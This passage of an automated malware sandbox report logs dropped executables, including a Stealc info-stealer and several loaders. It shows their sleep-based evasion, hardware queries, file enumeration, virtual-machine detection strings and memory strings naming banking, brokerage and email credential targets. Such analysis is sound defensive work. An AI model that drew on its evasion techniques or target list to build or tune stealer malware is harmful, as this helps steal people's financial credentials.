Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API coverage: 9.8 %
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	API coverage: 3.2 %
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	API coverage: 1.5 %
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API coverage: 5.5 %

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5428	Thread sleep count: 73 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5428	Thread sleep time: -146073s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6336	Thread sleep count: 1075 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6336	Thread sleep time: -2151075s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1448	Thread sleep count: 203 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1448	Thread sleep time: -6090000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6360	Thread sleep count: 1223 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6360	Thread sleep time: -2447223s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7028	Thread sleep count: 1180 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7028	Thread sleep time: -2361180s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5908	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1496	Thread sleep count: 1257 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1496	Thread sleep time: -2515257s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6360	Thread sleep count: 298 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6360	Thread sleep time: -596298s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe TID: 5192	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6128	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe TID: 7108	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe TID: 7060	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe TID: 3356	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe TID: 5916	Thread sleep count: 1735 > 30
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe TID: 5916	Thread sleep count: 4039 > 30
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe TID: 4152	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 6804	Thread sleep count: 403 > 30
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 6804	Thread sleep time: -12090000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 5824	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 6804	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe TID: 348	Thread sleep time: -38000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe TID: 6264	Thread sleep time: -42000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe TID: 2736	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe TID: 2300	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1108	Thread sleep time: -840000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 2052	Thread sleep time: -540000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 6988	Thread sleep time: -360000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1108	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 2448	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe TID: 4620	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe TID: 4164	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5844	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_0041B6DA FindFirstFileExW,	14_2_0041B6DA
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_004AD9FD FindFirstFileExW,	19_2_004AD9FD
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_0065D9FD FindFirstFileExW,	20_2_0065D9FD
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009EBCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	22_2_009EBCB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009ED8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	22_2_009ED8C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009EF4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	22_2_009EF4F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009F39B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	22_2_009F39B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009EE270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	22_2_009EE270
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009F43F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	22_2_009F43F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009E1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	22_2_009E1710
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009EDC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	22_2_009EDC50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009F4050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	22_2_009F4050
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009F33C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	22_2_009F33C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009EEB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	22_2_009EEB60

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 19_2_00477C40 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

19_2_00477C40

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Documents\desktop.ini

Source: Setup.exe, 0000001A.00000003.2495701453.0000000002EDC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	Binary or memory string: ParallelsVirtualMachine
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 1.exe, 00000018.00000000.2197490568.0000000000401000.00000020.00000001.01000000.00000018.sdmp, 1[1].exe.7.dr	Binary or memory string: QEMUU
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: RegAsm.exe, 0000000B.00000002.2119759552.000000000661F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}--
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.2766434406.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.2749654758.0000000001148000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.2749654758.00000000011A2000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2411676685.0000000001371000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000002.2776704139.0000000001371000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2412000367.0000000001371000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000001F.00000002.2753292846.0000000005355000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000001F.00000002.2753292846.0000000005396000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000001C.00000002.2400677209.00000000032B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe@\
Source: channel3[1].exe.31.dr	Binary or memory string: srcMessengerVMware
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000001C.00000002.2400677209.00000000032B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: RegAsm.exe, 0000000E.00000002.2004782582.0000000000479000.00000040.00000400.00020000.00000000.sdmp, CZjRdKVnFB.exe, 0000000F.00000000.2003484391.0000000000A12000.00000002.00000001.01000000.0000000E.sdmp, CZjRdKVnFB.exe.14.dr	Binary or memory string: HgFSVDCVdb86m2CfHM1
Source: svchost015.exe, 00000019.00000002.2456504727.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: RegAsm.exe, 0000002B.00000002.3096433679.0000000005D61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8J
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Nework.exe, 00000013.00000003.2034370926.000000000156D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: a-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}a
Source: Set-up[1].exe.7.dr	Binary or memory string: Disc_Soft_Ltd.vscode-insidersanaconda3CapCut\ProfilesRoaming\SUPERAntiSpywaregecko_cacheTikTok LIVE StudioPioneerOlkfluency\*webapp100bitNVIDIA CorporationLenovoServiceBridgeFree_PDF_SolutionsVMware2K GamesProgram FilesProgram Files (x86)ScratchibnejdfjmmkpcnlpebklmnkoeoihofecCPU: UserName (ComputerName):
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: axplong.exe, axplong.exe, 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: file.exe, 00000000.00000003.1468314119.0000000001363000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: rHCHrI9F0v.exe, 00000011.00000002.2175508408.0000000006382000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Setup.exe, 0000001A.00000002.2775174475.000000000132D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: RegAsm.exe, 0000000B.00000002.2119759552.0000000006660000.00000004.00000020.00020000.00000000.sdmp, Amadeus.exe, 0000001B.00000002.2508752812.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 0000001E.00000002.2462253215.0000000000604000.00000004.00000020.00020000.00000000.sdmp, Amadeus.exe, 00000026.00000002.2647391998.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 0000002C.00000002.2648842482.0000000000A88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: runtime.exe, 00000023.00000002.2747270234.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk
Source: RegAsm.exe, 0000002B.00000002.3053456029.000000000399E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: AppLaunch.exe, 0000001F.00000002.2753292846.0000000005396000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWU
Source: RegAsm.exe, 0000002B.00000002.2775940652.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
